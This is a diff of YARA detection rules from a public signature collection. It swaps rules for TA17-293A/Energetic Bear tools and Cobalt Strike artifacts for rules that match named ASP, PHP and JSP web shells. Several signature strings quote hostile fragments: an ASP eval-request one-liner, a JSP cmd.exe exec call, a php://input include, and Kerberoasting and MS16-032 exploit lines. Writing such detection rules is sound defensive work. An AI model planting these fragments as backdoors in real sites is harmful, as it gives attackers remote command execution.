-		$x7 = { 476F206275696C642049443A202266626433373937623163313465306531 }
-		$x8 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }
-		$x9 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }
-		$x10 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }
-		$x11 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }
-		$x12 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
-		$x13 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
-		$x14 = "http://bit.ly/2m0x8IH"
+		$s0 = "<input type=\"checkbox\" name=\"autoUpdate\" value=\"AutoUpdate\" on"
+		$s1 = "onblur=\"document.shell.autoUpdate.checked= this.oldValue;"
 
 	condition:
-		($n1 and 1 of ( $ax* ) ) or 2 of ( $s* ) or 1 of ( $x* )
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Energetic_Bear_Api_Hashing_Tool : FILE
+rule SIGNATURE_BASE_Webshell_Dx_Dx
 {
 	meta:
-		description = "Energetic Bear API Hashing Tool"
-		author = "CERT RE Team"
-		id = "4e58800a-9618-5d8b-954c-e843be6002c2"
-		date = "2026-02-22"
-		modified = "2023-12-05"
+		description = "Web Shell - file Dx.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L77-L93"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L829-L843"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f8a770c727cdd2d32d7cd1ad45ee8b37f7fc63c9e7f4311d318eb15d9050909"
-		score = 75
+		hash = "9cfe372d49fe8bf2fac8e1c534153d9b"
+		logic_hash = "c2eddf58b25caff79460ab9a87ac0573d483866a87c1b1ec0984afce2c22b29f"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		assoc_report = "DHS Report TA17-293A"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$api_hash_func_v1 = { 8A 08 84 C9 74 ?? 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }
-		$api_hash_func_v2 = { 8A 08 84 C9 74 ?? 80 C9 60 01 CB C1 E3 01 03 44 24 14 EB EC }
-		$api_hash_func_x64 = { 8A 08 84 C9 74 ?? 80 C9 60 48 01 CB 48 C1 E3 01 48 03 45 20 EB EA }
-		$http_push = "X-mode: push" nocase
-		$http_pop = "X-mode: pop" nocase
+		$s1 = "print \"\\n\".'Tip: to view the file \"as is\" - open the page in <a href=\"'.Dx"
+		$s9 = "class=linelisting><nobr>POST (php eval)</td><"
 
 	condition:
-		$api_hash_func_v1 or $api_hash_func_v2 or $api_hash_func_x64 and ( uint16( 0 ) == 0x5a4d or $http_push or $http_pop )
+		1 of them
 }
-rule SIGNATURE_BASE_TA17_293A_Query_XML_Code_MAL_DOC_PT_2 : FILE
+rule SIGNATURE_BASE_Webshell_Asp_Ntdaddy
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "other (modified by Florian Roth)"
-		id = "82b0f28a-94b6-52ab-8fd6-cdc05823ac34"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L95-L106"
+		description = "Web Shell - file ntdaddy.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L844-L858"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8d4c1b23aa8323fa9ddec362bb36e13e5f992883fbf7936b34cf03fe62ee6127"
-		score = 75
+		hash = "c5e6baa5d140f73b4e16a6cfde671c68"
+		logic_hash = "7237eb7233c6affcc1f67a764f704b7d7e1d13f71c64893286c6c99318cc7c3e"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		name = "Query_XML_Code_MAL_DOC_PT_2"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dir1 = "word/_rels/settings.xml.rels"
-		$bytes = {8c 90 cd 4e eb 30 10 85 d7}
+		$s9 = "if  FP  =  \"RefreshFolder\"  or  "
+		$s10 = "request.form(\"cmdOption\")=\"DeleteFolder\"  "
 
 	condition:
-		uint32( 0 ) == 0x04034b50 and $dir1 and $bytes
+		1 of them
 }
-rule SIGNATURE_BASE_TA17_293A_Query_XML_Code_MAL_DOC : FILE
+rule SIGNATURE_BASE_Webshell_Mysql_Web_Interface_Version_0_8
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "other (modified by Florian Roth)"
-		id = "82b0f28a-94b6-52ab-8fd6-cdc05823ac34"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L108-L120"
+		description = "Web Shell - file MySQL Web Interface Version 0.8.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L859-L872"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "fb3a84b66554e6c286ba64046d9b18a819f81108ee965862f288637ccee816d2"
-		score = 75
+		hash = "36d4f34d0a22080f47bb1cb94107c60f"
+		logic_hash = "680d4368804ad21e46dbe400563beca3ef724711b5432dccce1276ecadc04f2c"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		name = "Query_XML_Code_MAL_DOC"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$dir = "word/_rels/" ascii
-		$dir2 = "word/theme/theme1.xml" ascii
-		$style = "word/styles.xml" ascii
+		$s2 = "href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename'>Dump</a>"
 
 	condition:
-		uint32( 0 ) == 0x04034b50 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Query_Javascript_Decode_Function : FILE
+rule SIGNATURE_BASE_Webshell_Elmaliseker_2
 {
 	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "other (modified by Florian Roth)"
-		id = "bc206ab3-a86b-5abe-ae84-15abab838d4e"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L122-L140"
+		description = "Web Shell - file elmaliseker.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L873-L887"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8b42c67bdcdbb7c38128d8956904baa524d155b1e6957c5c1b5bc28fd8a57e8a"
-		score = 75
-		quality = 83
-		tags = "FILE"
-		name = "Query_Javascript_Decode_Function"
+		hash = "b32d1730d23a660fd6aa8e60c3dc549f"
+		logic_hash = "ca300cd142b3c8b820d3b5f5a56eeb834d9acb1d85916b932bd67fb4a25f4ed0"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
-		$decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
-		$decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
-		$decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}
+		$s1 = "<td<%if (FSO.GetExtensionName(path & \"\\\" & oFile.Name)=\"lnk\") or (FSO.GetEx"
+		$s6 = "<input type=button value=Save onclick=\"EditorCommand('Save')\"> <input type=but"
 
 	condition:
-		filesize < 20KB and all of ( $decode* )
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Hacktool_PS_1 : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Remexp
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Web Shell - file RemExp.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4b92536-fa9a-5a65-8bd6-84c037dfbdce"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L152-L166"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L888-L902"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a59834684cc1e7a34eeb8fb7f6cd1c414d6eab3ae58c6df763b2ec548705b371"
-		score = 75
+		hash = "aa1d8491f4e2894dbdb91eec1abc2244"
+		logic_hash = "7a3b35c4a16f26167180cea81f67de101edabb9b35479f7e5acae7f3fe07f304"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "72a28efb6e32e653b656ca32ccd44b3111145a695f6f6161965deebbdc437076"
 
 	strings:
-		$x1 = "$HashFormat = '$krb5tgs$23$*ID#124_DISTINGUISHED NAME: CN=fakesvc,OU=Service,OU=Accounts,OU=EnterpriseObjects,DC=asdf,DC=pd,DC=f" ascii
-		$x2 = "} | Where-Object {$_.SamAccountName -notmatch 'krbtgt'} | Get-SPNTicket @GetSPNTicketArguments" fullword ascii
+		$s0 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Reques"
+		$s1 = "Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal"
 
 	condition:
-		( filesize < 80KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Hacktool_Touch_MAC_Modification : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_List1
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Web Shell - file list1.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "69240cc0-a04e-544a-b7e3-c5a08c062055"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L168-L184"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L903-L917"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f4c6b653d1b6f4427c6582513d3c19cb8d580e669260a1afda01eecf8ce3bfc"
-		score = 75
+		hash = "8d9e5afa77303c9c01ff34ea4e7f6ca6"
+		logic_hash = "61ecafe477d98c5eb6887a9ff50960fc28b84512d09a36c02588159b08b395a4"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "070d7082a5abe1112615877214ec82241fd17e5bd465e24d794a470f699af88e"
 
 	strings:
-		$s1 = "-t time - use the time specified to update the access and modification times" fullword ascii
-		$s2 = "Failed to set file times for %s. Error: %x" fullword ascii
-		$s3 = "touch [-acm][ -r ref_file | -t time] file..." fullword ascii
-		$s4 = "-m - change the modification time only" fullword ascii
+		$s1 = "case 's':ConnectionDBM(out,encodeChange(request.getParameter(\"drive"
+		$s9 = "return \"<a href=\\\"javascript:delFile('\"+folderReplace(file)+\"')\\\""
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them )
+		all of them
 }
-rule SIGNATURE_BASE_TA17_293A_Hacktool_Exploit_MS16_032 : FILE
+rule SIGNATURE_BASE_Webshell_Phpkit_1_0_Odd
 {
 	meta:
-		description = "Auto-generated rule"
+		description = "Web Shell - file odd.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4c5838d7-9956-564e-a25c-f2ba5641ac03"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L186-L202"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L918-L933"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0f0bd4f8ae1e9689f111233ca8fdb9a9b6c20e526f22350c8204f64a54639dcd"
-		score = 75
+		hash = "594d1b1311bbef38a0eb3d6cbb1ab538"
+		logic_hash = "bf99d6a71b9ef72574d928a09f3a479f2f819287d78c9a5435e45752e76a59bf"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b97290300abb68fb48480718e6318ee2cdd4f099aa6438010fb2f44803e0b58"
 
 	strings:
-		$x1 = "[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($Thread)))" ascii
-		$x2 = "0x00000002, \"C:\\Windows\\System32\\cmd.exe\", \"\"," fullword ascii
-		$x3 = "PowerShell implementation of MS16-032. The exploit targets all vulnerable" fullword ascii
-		$x4 = "If we can't open the process token it's a SYSTEM shell!" fullword ascii
+		$s0 = "include('php://input');" fullword
+		$s1 = "// No eval() calls, no system() calls, nothing normally seen as malicious." fullword
+		$s2 = "ini_set('allow_url_include, 1'); // Allow url inclusion in this script" fullword
 
 	condition:
-		( filesize < 40KB and 1 of them )
+		all of them
 }
-
-rule SIGNATURE_BASE_Imphash_UPX_Packed_Malware_1_TA17_293A : FILE
+rule SIGNATURE_BASE_Webshell_Jsp_123
 {
 	meta:
-		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		description = "Web Shell - file 123.jsp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "3ff28f06-8b69-5e8f-ab45-dfa4f6e69812"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L206-L217"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L934-L949"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "398ccbd5e492fb1efa80dc07900ef77611c4b5bab95f715fce7b5dbeb0aff49d"
-		score = 75
+		hash = "c691f53e849676cac68a38d692467641"
+		logic_hash = "48925d3a302bf09ecb3f031301ca8afc722c7ef53b87efa27a3c4b58ee15217d"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a278256fbf2f061cfded7fdd58feded6765fade730374c508adad89282f67d77"
+
+	strings:
+		$s0 = "<font color=\"blue\">??????????????????:</font><input type=\"text\" size=\"7"
+		$s3 = "String path=new String(request.getParameter(\"path\").getBytes(\"ISO-8859-1\""
+		$s9 = "<input type=\"submit\" name=\"btnSubmit\" value=\"Upload\">    " fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "d7d745ea39c8c5b82d5e153d3313096c" )
+		all of them
 }
-
-rule SIGNATURE_BASE_Imphash_Malware_2_TA17_293A : HIGHVOL FILE
+rule SIGNATURE_BASE_Webshell_Asp_1
 {
 	meta:
-		description = "Detects malware based on Imphash of malware used in TA17-293A"
+		description = "Web Shell - file 1.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "5c9f32a3-8c50-5d46-929b-bbe14697540e"
-		date = "2017-10-21"
-		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L219-L229"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L950-L964"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5f91c07a9cc65c31eb9fd09bdd2752bc285c5a4b118ffe647391f7d187765de4"
-		score = 75
+		hash = "8991148adf5de3b8322ec5d78cb01bdb"
+		logic_hash = "9cae40c8fc3966942a8fc3ee0f5d07081ba2d1c1c3156144488ba64015d6838b"
+		score = 70
 		quality = 85
-		tags = "HIGHVOL, FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
+	strings:
+		$s4 = "!22222222222222222222222222222222222222222222222222" fullword
+		$s8 = "<%eval request(\"pass\")%>" fullword
+
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 5000KB and pe.imphash ( ) == "a8f69eb2cf9f30ea96961c86b4347282" )
+		all of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_C2_Host_Indicator : FILE
+rule SIGNATURE_BASE_Webshell_ASP_Tool
 {
 	meta:
-		description = "Detects CobaltStrike C2 host artifacts"
-		author = "yara@s3c.za.net"
-		id = "7f15ee30-664e-59b8-9e31-35d88e58a45e"
-		date = "2019-08-16"
-		modified = "2023-12-05"
+		description = "Web Shell - file tool.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L1-L14"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L965-L980"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4761e282e9473ba665a597894ed514d057309703a7d5b4e462ef0e779bbb8c39"
-		score = 60
-		quality = 65
-		tags = "FILE"
+		hash = "4ab68d38527d5834e9c1ff64407b34fb"
+		logic_hash = "62ba39bac09cb403a47678cd38c519642cc3c20f43c470b828ec448c42e9bb73"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$c2_indicator_fp = "#Host: %s"
-		$c2_indicator = "#Host:"
+		$s0 = "Response.Write \"<FORM action=\"\"\" & Request.ServerVariables(\"URL\") & \"\"\""
+		$s3 = "Response.Write \"<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='\" "
+		$s9 = "Response.Write \"<font face='arial' size='1'><a href=\"\"#\"\" onclick=\"\"javas"
 
 	condition:
-		$c2_indicator and not $c2_indicator_fp and not uint32( 0 ) == 0x0a786564 and not uint32( 0 ) == 0x0a796564
+		2 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_Sleep_Decoder_Indicator
+rule SIGNATURE_BASE_Webshell_Cmd_Win32
 {
 	meta:
-		description = "Detects CobaltStrike sleep_mask decoder"
-		author = "yara@s3c.za.net"
-		id = "d5b53d68-55f9-5837-9b0c-e7be2f3bd072"
-		date = "2021-07-19"
-		modified = "2023-12-05"
+		description = "Web Shell - file cmd_win32.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L16-L26"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L981-L995"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f3243c326df18edbd15c2d9120379588e61709efb9295b9584c0565c04ee38a5"
-		score = 75
+		hash = "cc4d4d6cc9a25984aa9a7583c7def174"
+		logic_hash = "b90ba15b7b2c557f7b2303695b7f1f737f63df06d712c89e0cfea51c7d37e21d"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sleep_decoder = { 48 89 5C 24 08 48 89 6C 24 10 48 89 74 24 18 57 48 83 EC 20 4C 8B 51 08 41 8B F0 48 8B EA 48 8B D9 45 8B 0A 45 8B 5A 04 4D 8D 52 08 45 85 C9 }
+		$s0 = "Process p = Runtime.getRuntime().exec(\"cmd.exe /c \" + request.getParam"
+		$s1 = "<FORM METHOD=\"POST\" NAME=\"myform\" ACTION=\"\">" fullword
 
 	condition:
-		$sleep_decoder
+		2 of them
 }
-rule SIGNATURE_BASE_Cobaltstrike_C2_Encoded_XOR_Config_Indicator
+rule SIGNATURE_BASE_Webshell_Jsp_Jshell
 {
 	meta:
-		description = "Detects CobaltStrike C2 encoded profile configuration"
-		author = "yara@s3c.za.net"
-		id = "8e33c63d-eaba-5851-88f4-ef7261a0a618"
-		date = "2021-07-08"
-		modified = "2023-12-05"
+		description = "Web Shell - file jshell.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cobaltstrike_evasive.yar#L28-L295"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6b25ee9064e925c183ef7599c95ecffce48c7f96eea714fa5f6441b21716277e"
-		score = 75
-		quality = 60
-		tags = ""
-
-	strings:
-		$s000 = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? 00 03 00 02 00 04 ?? ?? ?? ?? 00 04 00 02 00 04 ?? ?? ?? ?? 00 05 00 01 00 02 ?? ?? }
-		$s001 = { 01 00 01 00 01 03 ?? ?? 01 03 01 00 01 03 ?? ?? 01 02 01 03 01 05 ?? ?? ?? ?? 01 05 01 03 01 05 ?? ?? ?? ?? 01 04 01 00 01 03 ?? ?? }
-		$s002 = { 02 03 02 03 02 00 ?? ?? 02 00 02 03 02 00 ?? ?? 02 01 02 00 02 06 ?? ?? ?? ?? 02 06 02 00 02 06 ?? ?? ?? ?? 02 07 02 03 02 00 ?? ?? }
-		$s003 = { 03 02 03 02 03 01 ?? ?? 03 01 03 02 03 01 ?? ?? 03 00 03 01 03 07 ?? ?? ?? ?? 03 07 03 01 03 07 ?? ?? ?? ?? 03 06 03 02 03 01 ?? ?? }
-		$s004 = { 04 05 04 05 04 06 ?? ?? 04 06 04 05 04 06 ?? ?? 04 07 04 06 04 00 ?? ?? ?? ?? 04 00 04 06 04 00 ?? ?? ?? ?? 04 01 04 05 04 06 ?? ?? }
-		$s005 = { 05 04 05 04 05 07 ?? ?? 05 07 05 04 05 07 ?? ?? 05 06 05 07 05 01 ?? ?? ?? ?? 05 01 05 07 05 01 ?? ?? ?? ?? 05 00 05 04 05 07 ?? ?? }
-		$s006 = { 06 07 06 07 06 04 ?? ?? 06 04 06 07 06 04 ?? ?? 06 05 06 04 06 02 ?? ?? ?? ?? 06 02 06 04 06 02 ?? ?? ?? ?? 06 03 06 07 06 04 ?? ?? }
-		$s007 = { 07 06 07 06 07 05 ?? ?? 07 05 07 06 07 05 ?? ?? 07 04 07 05 07 03 ?? ?? ?? ?? 07 03 07 05 07 03 ?? ?? ?? ?? 07 02 07 06 07 05 ?? ?? }
-		$s008 = { 08 09 08 09 08 0A ?? ?? 08 0A 08 09 08 0A ?? ?? 08 0B 08 0A 08 0C ?? ?? ?? ?? 08 0C 08 0A 08 0C ?? ?? ?? ?? 08 0D 08 09 08 0A ?? ?? }
-		$s009 = { 09 08 09 08 09 0B ?? ?? 09 0B 09 08 09 0B ?? ?? 09 0A 09 0B 09 0D ?? ?? ?? ?? 09 0D 09 0B 09 0D ?? ?? ?? ?? 09 0C 09 08 09 0B ?? ?? }
-		$s010 = { 0A 0B 0A 0B 0A 08 ?? ?? 0A 08 0A 0B 0A 08 ?? ?? 0A 09 0A 08 0A 0E ?? ?? ?? ?? 0A 0E 0A 08 0A 0E ?? ?? ?? ?? 0A 0F 0A 0B 0A 08 ?? ?? }
-		$s011 = { 0B 0A 0B 0A 0B 09 ?? ?? 0B 09 0B 0A 0B 09 ?? ?? 0B 08 0B 09 0B 0F ?? ?? ?? ?? 0B 0F 0B 09 0B 0F ?? ?? ?? ?? 0B 0E 0B 0A 0B 09 ?? ?? }
-		$s012 = { 0C 0D 0C 0D 0C 0E ?? ?? 0C 0E 0C 0D 0C 0E ?? ?? 0C 0F 0C 0E 0C 08 ?? ?? ?? ?? 0C 08 0C 0E 0C 08 ?? ?? ?? ?? 0C 09 0C 0D 0C 0E ?? ?? }
-		$s013 = { 0D 0C 0D 0C 0D 0F ?? ?? 0D 0F 0D 0C 0D 0F ?? ?? 0D 0E 0D 0F 0D 09 ?? ?? ?? ?? 0D 09 0D 0F 0D 09 ?? ?? ?? ?? 0D 08 0D 0C 0D 0F ?? ?? }
